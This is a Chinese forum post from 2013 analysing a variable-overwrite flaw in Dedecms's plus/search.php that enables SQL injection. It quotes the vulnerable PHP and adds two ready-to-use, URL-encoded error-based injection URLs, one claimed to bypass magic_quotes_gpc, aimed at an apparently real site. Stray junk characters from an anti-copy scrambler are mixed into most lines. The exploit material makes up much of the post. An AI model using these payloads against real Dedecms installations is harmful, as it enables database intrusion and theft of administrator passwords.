微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.
! |9 R! X5 R1 V( E0 y. b" U5 q. {作者: c4rp3nt3r@0x50sec.org2 d5 N4 t1 T* s/ t2 U
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.: _! V4 U* W" T9 e7 q3 N! H: ^ T7 p
: q0 c" h6 \$ d, I
黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧.
' L( c/ a S) k8 B2 r
/ ]$ ?; }1 v; K============# g) C) ?: D7 }/ v: Q: u9 e
& r+ s) Q+ X8 N; Y- ]* R / f6 y& z2 E" D( x0 V1 @
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.9 u1 N2 [) U* d) K' V7 Q9 H
2 n( j$ p; m Q% \
require_once(dirname(__FILE__).”/../include/common.inc.php”);% L, x' C% K; Q1 K% j5 }, t+ o4 [
require_once(DEDEINC.”/arc.searchview.class.php”);; D; z) n" ~6 u; F2 F5 _
' {+ k9 q% E. E, P5 u( J3 o( }& k7 f$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;) Y( o# T9 Z4 }( a
$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;* w& ]6 K) V% e+ l
$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;9 z h4 l% s( `: x+ H/ c
$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;
% {8 H: C6 d' ~% [. _$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;+ ^$ f1 v: R8 i/ h) t: l9 X y
, v8 N% x5 X" h! r. q: j" Bif(!isset($orderby)) $orderby=”;
# G( z* A7 N `$ C; x: L+ P" delse $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);( U4 q( G5 J! {- I8 m! I0 b
! X" R. m/ j3 O& v7 w B4 W
2 o. h. s% z4 V7 \/ ]6 X Iif(!isset($searchtype)) $searchtype = ‘titlekeyword’;
7 U, ]' d; p$ Q4 ]0 selse $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);
) J0 n" ]' a$ |' c! k7 |0 D* Z 9 F9 f1 x- x1 `% I
if(!isset($keyword)){* r- V8 z6 q! ^7 {9 Y9 N8 |
if(!isset($q)) $q = ”;( m- Z# N- l# [/ e2 ~
$keyword=$q;
( @$ V8 `0 o5 s3 K}# }, ~) D( l1 Y5 b) A$ @
+ `' C; {1 l9 O$ |2 m& y1 p$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));, j% y# o5 O9 ~$ Y, s1 H
$ a+ G0 j( g) C9 @- ]
//查找栏目信息; ?' ?5 J+ E* p. ^- o1 Y p' X
if(empty($typeid))" Y" }3 l6 G4 w2 @1 ?5 M! \
{. b N1 Q* M. o7 l
$typenameCacheFile = DEDEDATA.’/cache/typename.inc’;
& V* c" @1 G1 L9 D* g0 [ if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) )
6 F1 ?) V) W; H0 z* ~0 N {9 d1 p p, o! z. y- e
$fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);7 r' y0 |* o' H4 J9 g( R; P
fwrite($fp, “<”.”?php\r\n”);" a: P" v5 K. I
$dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);4 W7 _0 Q' k( u3 X- P8 H
$dsql->Execute();
' v6 ~9 o2 i/ R. Z6 f! f while($row = $dsql->GetArray())
* i! p5 s; m1 f3 V {
# B# x: M( Z. m* G, b) l- c7 [ fwrite($fp, “\$typeArr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);
; W4 z+ Z2 R: k( o% B* A$ z* H }1 Q! T4 f# Y1 G' u+ f1 _
fwrite($fp, ‘?’.'>’);
% W' R- @ T; A- Y% w fclose($fp);3 r; x$ `8 O: X Q* _: E
}
: c/ @/ S$ ?+ N //引入栏目缓存并看关键字是否有相关栏目内容
+ @! x4 z# x) I& Y' x( R; ^- ~ require_once($typenameCacheFile);8 g4 g; ~- D8 M! n4 I% _
//$typeArr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个. D- l0 y' i9 T) F: ^) C/ ^
//
. Y8 g1 m' A4 R* z( b if(isset($typeArr) && is_array($typeArr)); U! }& l. i" m
{
5 i4 } l( }) ? ?* U0 R foreach($typeArr as $id=>$typename)& c2 |2 W0 P* w" h- @
{
# L" q! `' O) g# w6 T! b& Z
. G/ e" [7 M) ?- C4 \. c. @0 b1 T) P/ O <font color=”Red”>$keywordn = str_replace($typename, ‘ ‘, $keyword);</font> //这个地方要绕过
- x) H9 k4 w9 }; y1 H2 x, M if($keyword != $keywordn)
. [+ T% }+ }' |/ F$ G! z/ z2 X$ q {5 O% O9 v' R1 w s
$keyword = $keywordn;
, A- R" Q- N+ j1 M# U4 t <font color=”Red”>$typeid = $id; </font>// 这里存在变量覆盖漏洞使 $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; 这句过滤成了摆设
8 h# S0 B& G' {9 U m break;
' {9 g% p* M3 S& Q8 ^$ E: h& L% @ }
5 i0 ?1 R7 O+ a0 p }+ O6 o) Z- d- P* s5 n
}# H1 @- ~; o9 G" o( m
}
( a, R8 N* x% l) x8 @' O" q, u然后plus/search.php文件下面定义了一个 Search类的对象 .
8 B- G- T7 D, D在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类.
, Z7 k& C) q& {/ V; [- q+ |3 A1 f( R, _$this->TypeLink = new TypeLink($typeid);
4 t: n1 w: P$ L+ E6 G* ?4 i# W* M $ K$ Q. U6 v* A
TypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了… )直接带入了sql语句.
$ _" n' p \) {9 { / I O/ W- Y8 y4 K% Z
class TypeLink
# Z. ?) M8 i7 j8 p{
$ x) I1 c4 g8 k var $typeDir;
8 t1 q9 F! D6 @- Q var $dsql;5 j6 E: ~" k6 Z5 f- w
var $TypeID;
0 L4 m6 k2 B$ F+ e/ L$ F% | var $baseDir;
; G! n6 {4 L7 ~# b var $modDir;
+ c. `' M5 ~: F* I) V9 `9 }- { var $indexUrl;) k2 A. x' x+ M$ \0 ?& ~) g
var $indexName;" t7 w- n' n3 f0 S" o4 D
var $TypeInfos;5 \/ N+ e4 {2 t8 S* H
var $SplitSymbol;+ V( J$ k# M0 ^. M( Q" d3 p/ o$ W/ s
var $valuePosition;, I# Z6 u. a+ j2 G6 Y/ K, _
var $valuePositionName;
; u4 R' L7 j8 a1 J' B' q var $OptionArrayList;//构造函数///////
1 A6 S" W2 S0 @2 {4 ~( U //php5构造函数
' B, f+ Y, h" v+ G" V" v4 J) R function __construct($typeid)
# b$ T. b- L- b- I& I+ r5 h9 T {
7 Q% K( g* s4 W $this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];- j/ l3 S4 z" q A* v
$this->indexName = $GLOBALS['cfg_indexname'];4 e F4 n5 _) L2 k
$this->baseDir = $GLOBALS['cfg_basedir'];0 t" h2 I# O2 R1 T% j$ ]
$this->modDir = $GLOBALS['cfg_templets_dir'];
: I- S @& e) H* W; @$ g $this->SplitSymbol = $GLOBALS['cfg_list_symbol'];; C& z) ?$ V: ^+ x
$this->dsql = $GLOBALS['dsql'];7 K3 I/ f% }- \) X+ X
$this->TypeID = $typeid;
- [5 ^ W3 v/ ~4 D $this->valuePosition = ”;& P& v, E& K1 {+ `
$this->valuePositionName = ”;
# a# }5 ]& L. z! G. Z8 b $this->typeDir = ”;
. X. @0 h3 ]4 D4 D, @ $this->OptionArrayList = ”;
2 s0 [0 m! H) ~8 X+ B- t2 g. q
8 x& B+ |# x, J; V$ w //载入类目信息
/ w/ y7 d: P5 o. F' V
# K) T( Z |4 T) G0 Z9 z' e1 Q* ` <font color=”Red”>$query = “SELECT tp.*,ch.typename as2 `0 S$ K; `2 ^, ~# Q: W$ `2 Q+ V
ctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join; c" G9 v4 L. z. {. e5 |. U6 B* B, K6 y
`#@__channeltype` ch; H& o: ]* s/ i5 @7 J& k
on ch.id=tp.channeltype WHERE tp.id=’$typeid’ “;</font> //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿
* i) a5 a" z3 S& h' M7 i+ e$ Q W3 `( I ' u4 ^0 O2 ^+ U/ a7 y& D/ e
if($typeid > 0)
t. q, e' z$ i; c7 ]% \) x {; n& f) P* X1 v
$this->TypeInfos = $this->dsql->GetOne($query);
. h7 D$ w% L5 }利用代码一 需要 即使magic_quotes_gpc = Off/ U) w' I+ r- l- l8 ^4 B
* i7 Q m/ {% Y& Uwww.political-security.com/plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title
8 }- `' d, `8 A( W( @
* T! ]: t6 E- ?% Y% j1 u g9 }这只是其中一个利用代码… Search 类的构造函数再往下
2 ~3 T) n8 E0 \* h6 m
& k& p5 B0 t* W1 q* Z/ H1 H4 C……省略7 J8 u$ C% N# m! Z
$this->TypeID = $typeid;
3 ?0 z7 P8 Y$ f+ v# P1 i……省略
! j8 ~8 V1 b. ~! pif($this->TypeID==”0″){
/ L* X0 H! M: o' p $this->ChannelTypeid=1;
' P: L H4 h7 Y9 ~# W/ V }else{
5 W7 g0 t$ M8 T. |0 B. M# ] $row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //这里的注入漏洞无视magic_quotes_gpc = On的存在哦亲
. D# ^5 C7 e" ~$ ]//现在不鸡肋了吧亲…4 l6 h3 Z V4 s/ V/ T, I- `
$this->ChannelTypeid=$row['channeltype'];. C5 x8 c; j ?" }. a" b
/ d$ P# f# |1 \0 ^ }
6 J9 Z9 ]1 ?# c6 B5 |( M利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用.3 i* y) k% W% V% |3 r1 \: G& L1 q8 X
" k8 Q6 f& F' o& a# R5 N3 \/ lwww.political-security.com /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title
" p# z# s4 S7 D- Z. H( x 0 A t0 `( t! _& N8 P
如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站2 [3 ~% `* {! G2 L# m. E
|
发表于 2013-1-19 08:18:56
收藏
支持
反对